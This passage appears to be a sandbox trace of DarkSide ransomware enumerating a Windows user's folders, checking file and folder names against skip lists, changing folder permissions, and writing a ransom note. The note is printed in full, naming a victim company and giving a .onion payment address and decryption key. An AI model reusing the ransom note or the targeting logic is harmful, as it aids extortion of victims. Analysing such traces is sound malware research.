fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0159.383] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8cb36340, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cb36340, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.384] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.384] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0159.384] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0159.384] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0159.384] wcslen (_String="autorun.inf") returned 0xb [0159.384] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0159.384] wcslen (_String="boot.ini") returned 0x8 [0159.384] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0159.384] wcslen (_String="bootfont.bin") returned 0xc [0159.384] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0159.384] wcslen (_String="bootsect.bak") returned 0xc [0159.384] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0159.384] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0159.384] _wcsicmp (_Str1="Desktop.lnk", _Str2="README.c06622a1.TXT") returned -14 [0159.384] wcsstr (_Str="Desktop.lnk", _SubStr="README") returned 0x0 [0159.384] _wcsicmp (_Str1="autorun.inf", _Str2="Desktop.lnk") returned -3 [0159.384] wcslen (_String="autorun.inf") returned 0xb [0159.384] _wcsicmp (_Str1="boot.ini", _Str2="Desktop.lnk") returned -2 [0159.384] wcslen (_String="boot.ini") returned 0x8 [0159.384] _wcsicmp (_Str1="bootfont.bin", _Str2="Desktop.lnk") returned -2 [0159.384] wcslen (_String="bootfont.bin") returned 0xc [0159.384] _wcsicmp (_Str1="bootsect.bak", _Str2="Desktop.lnk") returned -2 [0159.384] wcslen (_String="bootsect.bak") returned 0xc [0159.384] _wcsicmp (_Str1="desktop.ini", _Str2="Desktop.lnk") returned -3 [0159.385] wcslen (_String="desktop.ini") returned 0xb [0159.385] _wcsicmp (_Str1="iconcache.db", _Str2="Desktop.lnk") returned 5 [0159.385] wcslen (_String="iconcache.db") returned 0xc [0159.385] _wcsicmp (_Str1="ntldr", _Str2="Desktop.lnk") returned 10 [0159.385] wcslen (_String="ntldr") returned 0x5 [0159.385] _wcsicmp (_Str1="ntuser.dat", _Str2="Desktop.lnk") returned 10 [0159.385] wcslen (_String="ntuser.dat") returned 0xa [0159.385] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Desktop.lnk") returned 10 [0159.385] wcslen (_String="ntuser.dat.log") returned 0xe [0159.385] _wcsicmp (_Str1="ntuser.ini", _Str2="Desktop.lnk") returned 10 [0159.385] wcslen (_String="ntuser.ini") returned 0xa [0159.385] _wcsicmp (_Str1="thumbs.db", _Str2="Desktop.lnk") returned 16 [0159.385] wcslen (_String="thumbs.db") returned 0x9 [0159.385] _wcsicmp (_Str1="386", _Str2="lnk") returned -57 [0159.385] wcslen (_String="386") returned 0x3 [0159.385] _wcsicmp (_Str1="adv", _Str2="lnk") returned -11 [0159.385] wcslen (_String="adv") returned 0x3 [0159.385] _wcsicmp (_Str1="ani", _Str2="lnk") returned -11 [0159.385] wcslen (_String="ani") returned 0x3 [0159.385] _wcsicmp (_Str1="bat", _Str2="lnk") returned -10 [0159.385] wcslen (_String="bat") returned 0x3 [0159.385] _wcsicmp (_Str1="bin", _Str2="lnk") returned -10 [0159.385] wcslen (_String="bin") returned 0x3 [0159.385] _wcsicmp (_Str1="cab", _Str2="lnk") returned -9 [0159.385] wcslen (_String="cab") returned 0x3 [0159.385] _wcsicmp (_Str1="cmd", _Str2="lnk") returned -9 [0159.385] wcslen (_String="cmd") returned 0x3 [0159.385] _wcsicmp (_Str1="com", _Str2="lnk") returned -9 [0159.385] wcslen (_String="com") returned 0x3 [0159.385] _wcsicmp (_Str1="cpl", _Str2="lnk") returned -9 [0159.385] wcslen (_String="cpl") returned 0x3 [0159.385] _wcsicmp (_Str1="cur", _Str2="lnk") returned -9 [0159.386] wcslen (_String="cur") returned 0x3 [0159.386] _wcsicmp (_Str1="deskthemepack", _Str2="lnk") returned -8 [0159.386] wcslen (_String="deskthemepack") returned 0xd [0159.386] _wcsicmp (_Str1="diagcab", _Str2="lnk") returned -8 [0159.386] wcslen (_String="diagcab") returned 0x7 [0159.386] _wcsicmp (_Str1="diagcfg", _Str2="lnk") returned -8 [0159.386] wcslen (_String="diagcfg") returned 0x7 [0159.386] _wcsicmp (_Str1="diagpkg", _Str2="lnk") returned -8 [0159.386] wcslen (_String="diagpkg") returned 0x7 [0159.386] _wcsicmp (_Str1="dll", _Str2="lnk") returned -8 [0159.386] wcslen (_String="dll") returned 0x3 [0159.386] _wcsicmp (_Str1="drv", _Str2="lnk") returned -8 [0159.386] wcslen (_String="drv") returned 0x3 [0159.386] _wcsicmp (_Str1="exe", _Str2="lnk") returned -7 [0159.386] wcslen (_String="exe") returned 0x3 [0159.386] _wcsicmp (_Str1="hlp", _Str2="lnk") returned -4 [0159.386] wcslen (_String="hlp") returned 0x3 [0159.386] _wcsicmp (_Str1="icl", _Str2="lnk") returned -3 [0159.386] wcslen (_String="icl") returned 0x3 [0159.386] _wcsicmp (_Str1="icns", _Str2="lnk") returned -3 [0159.386] wcslen (_String="icns") returned 0x4 [0159.386] _wcsicmp (_Str1="ico", _Str2="lnk") returned -3 [0159.386] wcslen (_String="ico") returned 0x3 [0159.386] _wcsicmp (_Str1="ics", _Str2="lnk") returned -3 [0159.386] wcslen (_String="ics") returned 0x3 [0159.386] _wcsicmp (_Str1="idx", _Str2="lnk") returned -3 [0159.386] wcslen (_String="idx") returned 0x3 [0159.386] _wcsicmp (_Str1="ldf", _Str2="lnk") returned -10 [0159.386] wcslen (_String="ldf") returned 0x3 [0159.386] _wcsicmp (_Str1="lnk", _Str2="lnk") returned 0 [0159.386] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0159.387] _wcsicmp (_Str1="Downloads.lnk", _Str2="README.c06622a1.TXT") returned -14 [0159.387] wcsstr (_Str="Downloads.lnk", _SubStr="README") returned 0x0 [0159.387] _wcsicmp (_Str1="autorun.inf", _Str2="Downloads.lnk") returned -3 [0159.387] wcslen (_String="autorun.inf") returned 0xb [0159.387] _wcsicmp (_Str1="boot.ini", _Str2="Downloads.lnk") returned -2 [0159.387] wcslen (_String="boot.ini") returned 0x8 [0159.387] _wcsicmp (_Str1="bootfont.bin", _Str2="Downloads.lnk") returned -2 [0159.387] wcslen (_String="bootfont.bin") returned 0xc [0159.387] _wcsicmp (_Str1="bootsect.bak", _Str2="Downloads.lnk") returned -2 [0159.387] wcslen (_String="bootsect.bak") returned 0xc [0159.387] _wcsicmp (_Str1="desktop.ini", _Str2="Downloads.lnk") returned -10 [0159.387] wcslen (_String="desktop.ini") returned 0xb [0159.387] _wcsicmp (_Str1="iconcache.db", _Str2="Downloads.lnk") returned 5 [0159.387] wcslen (_String="iconcache.db") returned 0xc [0159.387] _wcsicmp (_Str1="ntldr", _Str2="Downloads.lnk") returned 10 [0159.387] wcslen (_String="ntldr") returned 0x5 [0159.387] _wcsicmp (_Str1="ntuser.dat", _Str2="Downloads.lnk") returned 10 [0159.387] wcslen (_String="ntuser.dat") returned 0xa [0159.387] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Downloads.lnk") returned 10 [0159.387] wcslen (_String="ntuser.dat.log") returned 0xe [0159.387] _wcsicmp (_Str1="ntuser.ini", _Str2="Downloads.lnk") returned 10 [0159.387] wcslen (_String="ntuser.ini") returned 0xa [0159.387] _wcsicmp (_Str1="thumbs.db", _Str2="Downloads.lnk") returned 16 [0159.387] wcslen (_String="thumbs.db") returned 0x9 [0159.387] _wcsicmp (_Str1="386", _Str2="lnk") returned -57 [0159.387] wcslen (_String="386") returned 0x3 [0159.387] _wcsicmp (_Str1="adv", _Str2="lnk") returned -11 [0159.387] wcslen (_String="adv") returned 0x3 [0159.387] _wcsicmp (_Str1="ani", _Str2="lnk") returned -11 [0159.387] wcslen (_String="ani") returned 0x3 [0159.387] _wcsicmp (_Str1="bat", _Str2="lnk") returned -10 [0159.387] wcslen (_String="bat") returned 0x3 [0159.388] _wcsicmp (_Str1="bin", _Str2="lnk") returned -10 [0159.388] wcslen (_String="bin") returned 0x3 [0159.388] _wcsicmp (_Str1="cab", _Str2="lnk") returned -9 [0159.388] wcslen (_String="cab") returned 0x3 [0159.388] _wcsicmp (_Str1="cmd", _Str2="lnk") returned -9 [0159.388] wcslen (_String="cmd") returned 0x3 [0159.388] _wcsicmp (_Str1="com", _Str2="lnk") returned -9 [0159.388] wcslen (_String="com") returned 0x3 [0159.388] _wcsicmp (_Str1="cpl", _Str2="lnk") returned -9 [0159.388] wcslen (_String="cpl") returned 0x3 [0159.388] _wcsicmp (_Str1="cur", _Str2="lnk") returned -9 [0159.388] wcslen (_String="cur") returned 0x3 [0159.388] _wcsicmp (_Str1="deskthemepack", _Str2="lnk") returned -8 [0159.388] wcslen (_String="deskthemepack") returned 0xd [0159.388] _wcsicmp (_Str1="diagcab", _Str2="lnk") returned -8 [0159.388] wcslen (_String="diagcab") returned 0x7 [0159.388] _wcsicmp (_Str1="diagcfg", _Str2="lnk") returned -8 [0159.388] wcslen (_String="diagcfg") returned 0x7 [0159.388] _wcsicmp (_Str1="diagpkg", _Str2="lnk") returned -8 [0159.388] wcslen (_String="diagpkg") returned 0x7 [0159.388] _wcsicmp (_Str1="dll", _Str2="lnk") returned -8 [0159.388] wcslen (_String="dll") returned 0x3 [0159.388] _wcsicmp (_Str1="drv", _Str2="lnk") returned -8 [0159.388] wcslen (_String="drv") returned 0x3 [0159.388] _wcsicmp (_Str1="exe", _Str2="lnk") returned -7 [0159.388] wcslen (_String="exe") returned 0x3 [0159.388] _wcsicmp (_Str1="hlp", _Str2="lnk") returned -4 [0159.388] wcslen (_String="hlp") returned 0x3 [0159.388] _wcsicmp (_Str1="icl", _Str2="lnk") returned -3 [0159.388] wcslen (_String="icl") returned 0x3 [0159.388] _wcsicmp (_Str1="icns", _Str2="lnk") returned -3 [0159.388] wcslen (_String="icns") returned 0x4 [0159.388] _wcsicmp (_Str1="ico", _Str2="lnk") returned -3 [0159.389] wcslen (_String="ico") returned 0x3 [0159.389] _wcsicmp (_Str1="ics", _Str2="lnk") returned -3 [0159.389] wcslen (_String="ics") returned 0x3 [0159.389] _wcsicmp (_Str1="idx", _Str2="lnk") returned -3 [0159.389] wcslen (_String="idx") returned 0x3 [0159.389] _wcsicmp (_Str1="ldf", _Str2="lnk") returned -10 [0159.389] wcslen (_String="ldf") returned 0x3 [0159.389] _wcsicmp (_Str1="lnk", _Str2="lnk") returned 0 [0159.389] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cb36340, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8cb36340, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cb36340, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0159.389] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0159.389] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0159.389] _wcsicmp (_Str1="RecentPlaces.lnk", _Str2="README.c06622a1.TXT") returned 2 [0159.389] wcsstr (_Str="RecentPlaces.lnk", _SubStr="README") returned 0x0 [0159.389] _wcsicmp (_Str1="autorun.inf", _Str2="RecentPlaces.lnk") returned -17 [0159.389] wcslen (_String="autorun.inf") returned 0xb [0159.389] _wcsicmp (_Str1="boot.ini", _Str2="RecentPlaces.lnk") returned -16 [0159.389] wcslen (_String="boot.ini") returned 0x8 [0159.389] _wcsicmp (_Str1="bootfont.bin", _Str2="RecentPlaces.lnk") returned -16 [0159.389] wcslen (_String="bootfont.bin") returned 0xc [0159.389] _wcsicmp (_Str1="bootsect.bak", _Str2="RecentPlaces.lnk") returned -16 [0159.389] wcslen (_String="bootsect.bak") returned 0xc [0159.389] _wcsicmp (_Str1="desktop.ini", _Str2="RecentPlaces.lnk") returned -14 [0159.389] wcslen (_String="desktop.ini") returned 0xb [0159.389] _wcsicmp (_Str1="iconcache.db", _Str2="RecentPlaces.lnk") returned -9 [0159.389] wcslen (_String="iconcache.db") returned 0xc [0159.389] _wcsicmp (_Str1="ntldr", _Str2="RecentPlaces.lnk") returned -4 [0159.389] wcslen (_String="ntldr") returned 0x5 [0159.389] _wcsicmp (_Str1="ntuser.dat", _Str2="RecentPlaces.lnk") returned -4 [0159.389] wcslen (_String="ntuser.dat") returned 0xa [0159.389] _wcsicmp (_Str1="ntuser.dat.log", _Str2="RecentPlaces.lnk") returned -4 [0159.389] wcslen (_String="ntuser.dat.log") returned 0xe [0159.389] _wcsicmp (_Str1="ntuser.ini", _Str2="RecentPlaces.lnk") returned -4 [0159.390] wcslen (_String="ntuser.ini") returned 0xa [0159.390] _wcsicmp (_Str1="thumbs.db", _Str2="RecentPlaces.lnk") returned 2 [0159.390] wcslen (_String="thumbs.db") returned 0x9 [0159.390] _wcsicmp (_Str1="386", _Str2="lnk") returned -57 [0159.390] wcslen (_String="386") returned 0x3 [0159.390] _wcsicmp (_Str1="adv", _Str2="lnk") returned -11 [0159.390] wcslen (_String="adv") returned 0x3 [0159.390] _wcsicmp (_Str1="ani", _Str2="lnk") returned -11 [0159.390] wcslen (_String="ani") returned 0x3 [0159.390] _wcsicmp (_Str1="bat", _Str2="lnk") returned -10 [0159.390] wcslen (_String="bat") returned 0x3 [0159.390] _wcsicmp (_Str1="bin", _Str2="lnk") returned -10 [0159.390] wcslen (_String="bin") returned 0x3 [0159.390] _wcsicmp (_Str1="cab", _Str2="lnk") returned -9 [0159.390] wcslen (_String="cab") returned 0x3 [0159.390] _wcsicmp (_Str1="cmd", _Str2="lnk") returned -9 [0159.390] wcslen (_String="cmd") returned 0x3 [0159.390] _wcsicmp (_Str1="com", _Str2="lnk") returned -9 [0159.390] wcslen (_String="com") returned 0x3 [0159.390] _wcsicmp (_Str1="cpl", _Str2="lnk") returned -9 [0159.390] wcslen (_String="cpl") returned 0x3 [0159.390] _wcsicmp (_Str1="cur", _Str2="lnk") returned -9 [0159.390] wcslen (_String="cur") returned 0x3 [0159.390] _wcsicmp (_Str1="deskthemepack", _Str2="lnk") returned -8 [0159.390] wcslen (_String="deskthemepack") returned 0xd [0159.390] _wcsicmp (_Str1="diagcab", _Str2="lnk") returned -8 [0159.390] wcslen (_String="diagcab") returned 0x7 [0159.390] _wcsicmp (_Str1="diagcfg", _Str2="lnk") returned -8 [0159.390] wcslen (_String="diagcfg") returned 0x7 [0159.390] _wcsicmp (_Str1="diagpkg", _Str2="lnk") returned -8 [0159.391] wcslen (_String="diagpkg") returned 0x7 [0159.391] _wcsicmp (_Str1="dll", _Str2="lnk") returned -8 [0159.391] wcslen (_String="dll") returned 0x3 [0159.391] _wcsicmp (_Str1="drv", _Str2="lnk") returned -8 [0159.391] wcslen (_String="drv") returned 0x3 [0159.391] _wcsicmp (_Str1="exe", _Str2="lnk") returned -7 [0159.391] wcslen (_String="exe") returned 0x3 [0159.391] _wcsicmp (_Str1="hlp", _Str2="lnk") returned -4 [0159.391] wcslen (_String="hlp") returned 0x3 [0159.391] _wcsicmp (_Str1="icl", _Str2="lnk") returned -3 [0159.391] wcslen (_String="icl") returned 0x3 [0159.391] _wcsicmp (_Str1="icns", _Str2="lnk") returned -3 [0159.391] wcslen (_String="icns") returned 0x4 [0159.391] _wcsicmp (_Str1="ico", _Str2="lnk") returned -3 [0159.391] wcslen (_String="ico") returned 0x3 [0159.391] _wcsicmp (_Str1="ics", _Str2="lnk") returned -3 [0159.391] wcslen (_String="ics") returned 0x3 [0159.391] _wcsicmp (_Str1="idx", _Str2="lnk") returned -3 [0159.391] wcslen (_String="idx") returned 0x3 [0159.391] _wcsicmp (_Str1="ldf", _Str2="lnk") returned -10 [0159.391] wcslen (_String="ldf") returned 0x3 [0159.391] _wcsicmp (_Str1="lnk", _Str2="lnk") returned 0 [0159.391] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.391] FindClose (in: hFindFile=0x154148 | out: hFindFile=0x154148) returned 1 [0159.391] _wcsicmp (_Str1="backup", _Str2="Links") returned -10 [0159.391] wcslen (_String="backup") returned 0x6 [0159.391] _wcsicmp (_Str1="bak", _Str2="Links") returned -10 [0159.391] wcslen (_String="bak") returned 0x3 [0159.392] _wcsicmp (_Str1="back", _Str2="Links") returned -10 [0159.392] wcslen (_String="back") returned 0x4 [0159.392] _wcsicmp (_Str1="archive", _Str2="Links") returned -11 [0159.392] wcslen (_String="archive") returned 0x7 [0159.392] _wcsicmp (_Str1="bckp", _Str2="Links") returned -10 [0159.392] wcslen (_String="bckp") returned 0x4 [0159.392] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1f8e18) returned 1 [0159.392] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0159.393] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0159.393] FindNextFileW (in: hFindFile=0x152f98, lpFindFileData=0x32f01c | out: lpFindFileData=0x32f01c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd964e420, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd964e420, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0159.393] _wcsicmp (_Str1="$recycle.bin", _Str2="Music") returned -73 [0159.393] wcslen (_String="$recycle.bin") returned 0xc [0159.393] _wcsicmp (_Str1="config.msi", _Str2="Music") returned -10 [0159.393] wcslen (_String="config.msi") returned 0xa [0159.393] _wcsicmp (_Str1="$windows.~bt", _Str2="Music") returned -73 [0159.393] wcslen (_String="$windows.~bt") returned 0xc [0159.393] _wcsicmp (_Str1="$windows.~ws", _Str2="Music") returned -73 [0159.393] wcslen (_String="$windows.~ws") returned 0xc [0159.393] _wcsicmp (_Str1="windows", _Str2="Music") returned 10 [0159.393] wcslen (_String="windows") returned 0x7 [0159.393] _wcsicmp (_Str1="appdata", _Str2="Music") returned -12 [0159.393] wcslen (_String="appdata") returned 0x7 [0159.393] _wcsicmp (_Str1="application data", _Str2="Music") returned -12 [0159.393] wcslen (_String="application data") returned 0x10 [0159.393] _wcsicmp (_Str1="boot", _Str2="Music") returned -11 [0159.393] wcslen (_String="boot") returned 0x4 [0159.393] _wcsicmp (_Str1="google", _Str2="Music") returned -6 [0159.393] wcslen (_String="google") returned 0x6 [0159.424] _wcsicmp (_Str1="mozilla", _Str2="Music") returned -6 [0159.424] wcslen (_String="mozilla") returned 0x7 [0159.424] _wcsicmp (_Str1="program files", _Str2="Music") returned 3 [0159.424] wcslen (_String="program files") returned 0xd [0159.424] _wcsicmp (_Str1="program files (x86)", _Str2="Music") returned 3 [0159.424] wcslen (_String="program files (x86)") returned 0x13 [0159.424] _wcsicmp (_Str1="programdata", _Str2="Music") returned 3 [0159.424] wcslen (_String="programdata") returned 0xb [0159.424] _wcsicmp (_Str1="system volume information", _Str2="Music") returned 6 [0159.424] wcslen (_String="system volume information") returned 0x19 [0159.424] _wcsicmp (_Str1="tor browser", _Str2="Music") returned 7 [0159.424] wcslen (_String="tor browser") returned 0xb [0159.425] _wcsicmp (_Str1="windows.old", _Str2="Music") returned 10 [0159.425] wcslen (_String="windows.old") returned 0xb [0159.425] _wcsicmp (_Str1="intel", _Str2="Music") returned -4 [0159.425] wcslen (_String="intel") returned 0x5 [0159.425] _wcsicmp (_Str1="msocache", _Str2="Music") returned -2 [0159.425] wcslen (_String="msocache") returned 0x8 [0159.425] _wcsicmp (_Str1="perflogs", _Str2="Music") returned 3 [0159.425] wcslen (_String="perflogs") returned 0x8 [0159.425] _wcsicmp (_Str1="x64dbg", _Str2="Music") returned 11 [0159.425] wcslen (_String="x64dbg") returned 0x6 [0159.425] _wcsicmp (_Str1="public", _Str2="Music") returned 3 [0159.425] wcslen (_String="public") returned 0x6 [0159.425] _wcsicmp (_Str1="all users", _Str2="Music") returned -12 [0159.425] wcslen (_String="all users") returned 0x9 [0159.425] _wcsicmp (_Str1="default", _Str2="Music") returned -9 [0159.425] wcslen (_String="default") returned 0x7 [0159.425] wcscpy (in: _Dest=0x1d1000, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*" [0159.426] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*") returned 0x23 [0159.426] wcscpy (in: _Dest=0x1d1044, _Source="Music" | out: _Dest="Music") returned="Music" [0159.426] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1f8e18 [0159.426] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0159.427] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0159.427] GetNamedSecurityInfoW () returned 0x0 [0159.427] SetEntriesInAclW () returned 0x0 [0159.427] SetNamedSecurityInfoW () returned 0x0 [0159.514] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22b708) returned 1 [0159.514] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32eb6c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0159.514] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 1 [0159.514] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0159.514] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0159.514] WriteFile (in: hFile=0x1a4, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32eb3c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32eb3c*=0x7ca, lpOverlapped=0x0) returned 1 [0159.515] CloseHandle (hObject=0x1a4) returned 1 [0159.515] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0159.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 